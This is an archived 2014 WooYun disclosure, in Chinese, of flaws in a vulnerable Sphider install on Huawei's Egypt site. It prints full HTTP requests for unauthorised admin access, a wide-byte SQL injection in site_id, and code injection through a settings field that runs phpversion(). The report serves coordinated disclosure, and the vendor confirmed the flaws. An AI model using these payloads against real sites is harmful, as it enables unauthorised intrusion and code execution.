乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-08-08: 细节已通知厂商并且等待厂商处理中 2014-08-12: 厂商已经确认,细节仅向厂商公开 2014-08-22: 细节向核心白帽子及相关领域专家公开 2014-09-01: 细节向普通白帽子公开 2014-09-11: 细节向实习白帽子公开 2014-09-22: 细节向公众公开
1.后台未授权访问2.sql注入3.命令执行
问题点:http://www.huaweidevice.com.eg/huawei_ar/sphider/admin/admin.php使用了有漏洞的sphider版本。1.后台未授权访问request:
POST /huawei_ar/sphider/admin/admin.php HTTP/1.1Host: www.huaweidevice.com.egUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateConnection: keep-aliveCache-Control: max-age=0Content-Type: application/x-www-form-urlencodedContent-Length: 19user=admin&pass=bar
2.sql注入request:
POST /huawei_ar/sphider/admin/admin.php HTTP/1.1Host: www.huaweidevice.com.egUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateConnection: keep-aliveCache-Control: max-age=0Content-Type: application/x-www-form-urlencodedContent-Length: 36user=foo&pass=bar&f=20&site_id=1%df'
3.命令执行request;(获取 phpversion())
POST /huawei_ar/sphider/admin/admin.php HTTP/1.1Host: www.huaweidevice.com.egUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateCookie: PHPSESSID=7fabfda77b710466db1a18d65031fa66Connection: keep-aliveContent-Type: application/x-www-form-urlencodedContent-Length: 523user=foo&pass=bar&f=settings&Submit=ion_nr=1.3.5&_language=en&_template=standard&_admin_email=admin%40localhost&_tmp_dir=tmp&_log_dir=log&_log_format=html&_min_words_per_page=10&_min_word_length=3&_word_upper_bound=100&_pdftotext_path=&_catdoc_path=&_xls2csv_path=&_catppt_path=&_user_agent=&_min_delay=0&_results_per_page=10&_cat_columns=2&_bound_search_result=0&_length_of_link_desc=0&_links_to_next=9&_desc_length=250&_suggest_rows=0&_title_weight=20&_domain_weight=60&_path_weight=10&_meta_weight=5;echo%20phpversion();
shell什么的就不用了吧?
危害等级:高
漏洞Rank:15
确认时间:2014-08-12 11:19
感谢白帽子对华为公司的关注,相关的业务部门正在修补该漏洞信息。
暂无